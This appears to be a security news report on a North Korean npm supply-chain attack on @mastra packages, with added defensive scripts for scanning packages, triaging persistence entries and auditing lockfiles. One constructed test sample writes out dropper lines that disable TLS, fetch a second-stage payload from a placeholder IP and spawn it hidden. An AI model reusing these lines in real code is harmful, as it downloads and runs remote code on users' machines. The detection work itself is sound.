Sapphire Sleet compromised the npm maintainer account 'ehindero' and published malicious updates to over 140 packages in the @mastra scope. Microsoft attributed the attack to the North Korean state-backed group with high confidence, citing tradecraft and infrastructure that overlap with the group's earlier campaigns.
Typosquatted dayjs Dropped Cross-Platform Malware
The attackers added a dependency named "easy-day-js", a typosquat of the widely used dayjs library, to the compromised packages. Installing any of them pulled in the typosquat, whose postinstall hook ran an obfuscated dropper: it disabled TLS certificate verification, contacted a command-and-control server, downloaded a second-stage payload, and launched it as a detached, hidden process.
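The behaviours in that paragraph are all visible in a package before it is ever installed, so they are worth checking for statically. The script below is an added example written for this page, not code from the article, Microsoft's report, or the Mastra project. It scans a manifest and its install script for a lifecycle hook, TLS verification being switched off, a detached hidden child process, outbound network calls, dynamic code execution, and long packed literals. The package contents and the `setup.js` body are constructed to exercise each indicator (only the name `easy-day-js` comes from the article), and the regexes encode the common Node idioms for those behaviours; that any particular dropper uses exactly these idioms is an assumption.

```javascript
'use strict';
// Added example, not code from the article, Microsoft's report, or the Mastra
// project. Statically scans a package manifest plus its install script for the
// dropper traits the article describes. The regexes below are the usual Node
// idioms for each behaviour; that a given dropper uses them is an assumption.

const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

const SOURCE_INDICATORS = [
  { id: 'tls-verification-disabled',
    re: /NODE_TLS_REJECT_UNAUTHORIZED[^=\n]*=\s*['"]?0\b|rejectUnauthorized\s*:\s*false/ },
  { id: 'detached-hidden-process',
    re: /detached\s*:\s*true|windowsHide\s*:\s*true|\.unref\s*\(\s*\)/ },
  { id: 'outbound-network',
    re: /\brequire\s*\(\s*['"](?:https?|net|dns|dgram)['"]\s*\)|\bfetch\s*\(/ },
  { id: 'dynamic-code-execution',
    re: /\beval\s*\(|new\s+Function\s*\(|\bvm\.runIn\w+\s*\(/ },
  { id: 'packed-literal',
    // long \xNN escape runs or long base64 runs are how droppers carry payloads
    re: /(?:\\x[0-9a-fA-F]{2}){8,}|[A-Za-z0-9+/]{120,}={0,2}/ },
];

// One finding per lifecycle hook and per matched indicator. `where` is the hook
// name or the source file; `detail` is a short excerpt for the analyst.
function scanPackage(manifest, sources) {
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = manifest.scripts && manifest.scripts[hook];
    if (cmd) findings.push({ id: 'install-hook', where: hook, detail: cmd });
  }
  for (const [file, text] of Object.entries(sources)) {
    for (const { id, re } of SOURCE_INDICATORS) {
      const m = re.exec(text);
      if (m) findings.push({ id, where: file, detail: m[0].slice(0, 40) });
    }
  }
  return findings;
}

// A hook on its own is normal (native builds, esbuild, ...). A hook combined
// with two or more runtime behaviours is the dropper shape and gets blocked.
function verdict(findings) {
  const ids = new Set(findings.map((f) => f.id));
  const hook = ids.has('install-hook');
  const behaviours = [...ids].filter((id) => id !== 'install-hook').length;
  if (hook && behaviours >= 2) return 'block';
  if (hook || behaviours >= 2) return 'review';
  return 'allow';
}

// Constructed sample. The package name is the one the article reports; the
// manifest and setup.js contents are invented to trigger each indicator.
const SUSPECT_MANIFEST = {
  name: 'easy-day-js',
  version: '1.0.0',
  scripts: { postinstall: 'node setup.js' },
};
const SUSPECT_SOURCES = {
  'setup.js': [
    "process.env.NODE_TLS_REJECT_UNAUTHORIZED = '0';",
    "const https = require('https');",
    "https.get('https://203.0.113.10/stage2', (res) => { /* write to disk */ });",
    "require('child_process').spawn(process.execPath, ['/tmp/.s2.js'],",
    "  { detached: true, stdio: 'ignore', windowsHide: true }).unref();",
    "const blob = '" + '\\x90'.repeat(12) + "';",
  ].join('\n'),
};

// Constructed benign control: no hook, no runtime indicators.
const BENIGN_MANIFEST = { name: 'pad-left-example', version: '2.0.0', scripts: { test: 'node test.js' } };
const BENIGN_SOURCES = { 'index.js': 'module.exports = (s, n) => String(s).padStart(n);' };

for (const [label, manifest, sources] of [
  ['suspect', SUSPECT_MANIFEST, SUSPECT_SOURCES],
  ['benign', BENIGN_MANIFEST, BENIGN_SOURCES],
]) {
  const findings = scanPackage(manifest, sources);
  console.log(label, verdict(findings), findings.map((f) => `${f.id}@${f.where}`));
}
```

The thresholds are deliberately conservative: a lone postinstall hook is common in legitimate packages, so it only earns `review`, while a hook next to disabled TLS checks and a detached spawn is the pattern described above and earns `block`. Run it against the unpacked tarball (`npm pack` then extract) rather than `node_modules`, so the scan happens before any hook can fire, and pair it with `npm install --ignore-scripts` in CI.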
That second-stage payload was a cross-platform information stealer targeting Windows, Linux, and macOS. It collected host information, browser histories, installed applications, and running processes. Microsoft confirmed the malware checked for 166 cryptocurrency wallet browser extensions including MetaMask, Phantom, Coinbase Wallet, Binance Wallet, and TronLink.
Persistence That Ignores Your OS
The malware chose its persistence mechanism by operating system: Windows Registry Run keys, macOS LaunchAgents, and Linux systemd services. On systems that successfully reached the C2 infrastructure, Microsoft observed follow-on activity: a PowerShell backdoor previously tied to Sapphire Sleet, additional persistence, Microsoft Defender exclusions, and a malicious Windows service used to obtain SYSTEM privileges.
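Because the same implant lands in three different autostart locations, a hunt needs one record shape across all of them. The script below is an added example for this page, not code from the article or from Microsoft; it normalises the three artefacts named above (Run-key values, a LaunchAgent plist, a systemd unit) and flags entries whose command runs from, or executes a script from, a user-writable or hidden directory, or that asks for a hidden window. All three artefacts are constructed samples with invented labels and paths; the Run-key values are assumed to have already been exported into a name-to-command map (for example from `Get-ItemProperty`), and the list of suspect directories is an assumption to tune per fleet.

```javascript
'use strict';
// Added example, not code from the article or Microsoft's report. Normalises the
// three persistence artefacts the article names into one record shape and
// triages them. Samples, labels and paths below are constructed; the path and
// interpreter lists are assumptions to tune per environment.

// Directories a legitimate autostart entry rarely points at, plus any hidden dir.
const SUSPECT_PATH = /(\\|\/)(Temp|tmp|var\/tmp|dev\/shm|Caches|Public|Downloads)(\\|\/)|(\\|\/)\.[^\\\/]+(\\|\/)/i;
const INTERPRETER = /(^|[\\\/])(node|python3?|powershell|pwsh|bash|sh|zsh|osascript|wscript|cscript|mshta)(\.exe)?$/i;
const HIDDEN_FLAGS = /-w(indowstyle)?\s+hidden|-enc(odedcommand)?\s/i;

// Split a command line into argv, honouring double and single quotes.
function tokens(cmd) {
  const out = [];
  const re = /"([^"]*)"|'([^']*)'|(\S+)/g;
  let m;
  while ((m = re.exec(cmd)) !== null) out.push(m[1] ?? m[2] ?? m[3]);
  return out;
}

// Windows: values under a Run key, already exported as { valueName: command }.
function fromRunKey(hive, values) {
  return Object.entries(values).map(([name, command]) =>
    ({ os: 'windows', mechanism: `Run:${hive}`, name, command }));
}

// macOS: Label and ProgramArguments (or Program) from a LaunchAgent plist.
function fromLaunchAgent(plist) {
  const label = /<key>Label<\/key>\s*<string>([^<]*)<\/string>/.exec(plist);
  const block = /<key>ProgramArguments<\/key>\s*<array>([\s\S]*?)<\/array>/.exec(plist);
  const args = block ? [...block[1].matchAll(/<string>([^<]*)<\/string>/g)].map((m) => m[1]) : [];
  const program = /<key>Program<\/key>\s*<string>([^<]*)<\/string>/.exec(plist);
  const argv = args.length ? args : (program ? [program[1]] : []);
  const command = argv.map((a) => (/\s/.test(a) ? `"${a}"` : a)).join(' ');
  return [{ os: 'macos', mechanism: 'LaunchAgent', name: label ? label[1] : '?', command }];
}

// Linux: every Exec* line of a systemd unit, with launch prefixes (-, @, +, !) stripped.
function fromSystemdUnit(unitName, text) {
  return [...text.matchAll(/^\s*Exec(?:Start|StartPre|StartPost)=(.*)$/gm)].map((m) =>
    ({ os: 'linux', mechanism: 'systemd', name: unitName, command: m[1].replace(/^[-@:+!]+/, '').trim() }));
}

function triage(record) {
  const reasons = [];
  const argv = tokens(record.command);
  const exe = argv[0] || '';
  if (SUSPECT_PATH.test(exe)) reasons.push('executable in user-writable or hidden path');
  if (INTERPRETER.test(exe) && argv.slice(1).some((a) => SUSPECT_PATH.test(a))) {
    reasons.push('interpreter runs script from user-writable or hidden path');
  }
  if (HIDDEN_FLAGS.test(record.command)) reasons.push('hidden window or encoded command');
  return { ...record, suspicious: reasons.length > 0, reasons };
}

// Constructed samples: one benign Run value and three invented implant entries.
const RUN_KEY = {
  OneDrive: '"C:\\Users\\dev\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background',
  NodeSvcHelper: '"C:\\Users\\dev\\AppData\\Local\\Temp\\node.exe" "C:\\Users\\dev\\AppData\\Local\\Temp\\.cache\\s.js"',
};
const LAUNCH_AGENT = `<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.nodeupdate</string>
  <key>ProgramArguments</key>
  <array><string>/usr/local/bin/node</string><string>/Users/dev/Library/Caches/.node/s.js</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>`;
const SYSTEMD_UNIT = `[Unit]
Description=Node runtime helper
[Service]
ExecStart=/usr/bin/node /home/dev/.config/.cache/s.js
Restart=always
[Install]
WantedBy=default.target`;

function collect() {
  return [
    ...fromRunKey('HKCU', RUN_KEY),
    ...fromLaunchAgent(LAUNCH_AGENT),
    ...fromSystemdUnit('node-helper.service', SYSTEMD_UNIT),
  ].map(triage);
}

for (const r of collect()) {
  console.log(r.suspicious ? 'SUSPECT' : 'ok     ', r.os, r.mechanism, r.name, r.reasons.join('; '));
}
```

The benign OneDrive value passes because both the executable and its arguments live under a vendor directory; the three invented implant entries are caught by the script path alone, not by the interpreter, which is why the check looks at every argument and not just `argv[0]`. In a real hunt the collectors would read `Get-ItemProperty` output, `~/Library/LaunchAgents/*.plist` and `~/.config/systemd/user/*.service` respectively; the parsing and triage logic is unchanged.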
Microsoft noted that the PowerShell backdoor, tradecraft, and C2 infrastructure matched exactly what Sapphire Sleet used in earlier campaigns. The group also ran a separate npm supply chain attack against the Axios HTTP client in April 2026.
Why This Matters for Anyone Running npm
This was not a sophisticated 0-day exploit. It was a compromised maintainer account with publishing rights, abusing the trust developers place in npm scoped packages. The typosquat, easy-day-js in place of dayjs, shows the attackers counted on developers not reading the dependency tree closely: the malicious package never had to be installed directly, it arrived as a transitive dependency of packages teams already trusted. With 140+ packages poisoned, any CI/CD pipeline that resolved a @mastra package in that window could have been compromised.
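Reading the dependency tree closely is cheap to automate, because the lockfile already records who pulled in what and which packages carry install scripts. The audit below is an added example for this page, not code from the article or the Mastra project. It walks a `package-lock.json` v2/v3 `packages` map, reports every dependency that npm flagged with `hasInstallScript`, names that look like a popular package (normalised substring or edit distance of at most 2 against a small watchlist), entries resolved from somewhere other than the expected registry, and, for each finding, the packages that introduced it. The lockfile is constructed: its versions, URLs and integrity values are placeholders, not the real @mastra or easy-day-js metadata, and the watchlist is an assumption.

```javascript
'use strict';
// Added example, not code from the article or the Mastra project. Audits an npm
// lockfile (lockfileVersion 2/3 "packages" map) for transitive dependencies that
// carry install scripts, lookalike names, and unexpected registries, and names
// the dependents that introduced each one. The lockfile below is constructed;
// versions, URLs and integrity strings are placeholders, not real registry data.

const WATCHLIST = ['dayjs', 'moment', 'lodash', 'axios', 'express', 'chalk']; // assumption
const TRUSTED_REGISTRY = 'https://registry.npmjs.org/';

// "node_modules/@s/x/node_modules/y" -> "y"; "node_modules/@mastra/core" -> "@mastra/core"
function nameFromPath(p) {
  const i = p.lastIndexOf('node_modules/');
  return i === -1 ? p : p.slice(i + 'node_modules/'.length);
}

// Drop the scope, lowercase, strip separators so "easy-day-js" and "easydayjs" compare equal.
function normalize(name) {
  return name.replace(/^@[^/]+\//, '').toLowerCase().replace(/[^a-z0-9]/g, '');
}

// Classic single-row Levenshtein distance.
function levenshtein(a, b) {
  const prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = prev[0];
    prev[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const tmp = prev[j];
      prev[j] = Math.min(prev[j] + 1, prev[j - 1] + 1, diag + (a[i - 1] === b[j - 1] ? 0 : 1));
      diag = tmp;
    }
  }
  return prev[b.length];
}

// Returns the watchlist package a name imitates, or null if it is genuine or unrelated.
function lookalike(name) {
  const n = normalize(name);
  if (WATCHLIST.some((w) => normalize(w) === n)) return null; // the real package
  for (const popular of WATCHLIST) {
    const p = normalize(popular);
    if (n.includes(p) || levenshtein(n, p) <= 2) return popular;
  }
  return null;
}

// Map each dependency name to the lockfile entries that declare it.
function dependents(lock) {
  const out = {};
  for (const [path, entry] of Object.entries(lock.packages)) {
    for (const dep of Object.keys(entry.dependencies || {})) {
      (out[dep] = out[dep] || []).push(path === '' ? '<root>' : path);
    }
  }
  return out;
}

function auditLockfile(lock) {
  const findings = [];
  const parents = dependents(lock);
  for (const [path, entry] of Object.entries(lock.packages)) {
    if (path === '') continue; // the root project itself
    const name = nameFromPath(path);
    const via = (parents[name] || []).join(', ') || 'unknown';
    if (entry.hasInstallScript) findings.push({ name, issue: 'install-script', via });
    const target = lookalike(name);
    if (target) findings.push({ name, issue: `lookalike-of:${target}`, via });
    if (entry.resolved && !entry.resolved.startsWith(TRUSTED_REGISTRY)) {
      findings.push({ name, issue: 'untrusted-registry', via });
    }
    if (entry.resolved && !entry.integrity) findings.push({ name, issue: 'missing-integrity', via });
  }
  return findings;
}

// Constructed lockfile: an app depending on a @mastra package that in turn pulls
// in the typosquat alongside the genuine dayjs. All metadata values are placeholders.
const SAMPLE_LOCKFILE = {
  name: 'example-app', lockfileVersion: 3, requires: true,
  packages: {
    '': { name: 'example-app', dependencies: { '@mastra/core': '^0.0.0' } },
    'node_modules/@mastra/core': {
      version: '0.0.0-placeholder',
      resolved: 'https://registry.npmjs.org/@mastra/core/-/core-0.0.0-placeholder.tgz',
      integrity: 'sha512-PLACEHOLDER',
      dependencies: { 'easy-day-js': '^1.0.0', dayjs: '^1.11.0' },
    },
    'node_modules/easy-day-js': {
      version: '1.0.0',
      resolved: 'https://registry.npmjs.org/easy-day-js/-/easy-day-js-1.0.0.tgz',
      integrity: 'sha512-PLACEHOLDER',
      hasInstallScript: true,
    },
    'node_modules/dayjs': {
      version: '1.11.0',
      resolved: 'https://registry.npmjs.org/dayjs/-/dayjs-1.11.0.tgz',
      integrity: 'sha512-PLACEHOLDER',
    },
  },
};

for (const f of auditLockfile(SAMPLE_LOCKFILE)) console.log(`${f.issue}: ${f.name} (via ${f.via})`);
```

Run against a real tree, it is the `via` column that answers the question this incident raises: a maintainer of an application that never listed easy-day-js would see it attributed to the @mastra package that declared it. The lookalike heuristic is intentionally loose and will flag legitimate companions such as lodash-es for review; keep it as a review signal and pair it with an allowlist, while `install-script` findings on newly added transitive packages deserve a hard stop in CI until someone has read the hook.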
Test every layer before attackers do. Security teams log 54% of successful attacks and alert on just 14%. This attack reinforces that npm supply chain integrity needs continuous verification on every install and every lockfile change, not a one-time audit.
Source: Microsoft links Mastra AI supply chain attack to North Korean hackers
Domain: bleepingcomputer.com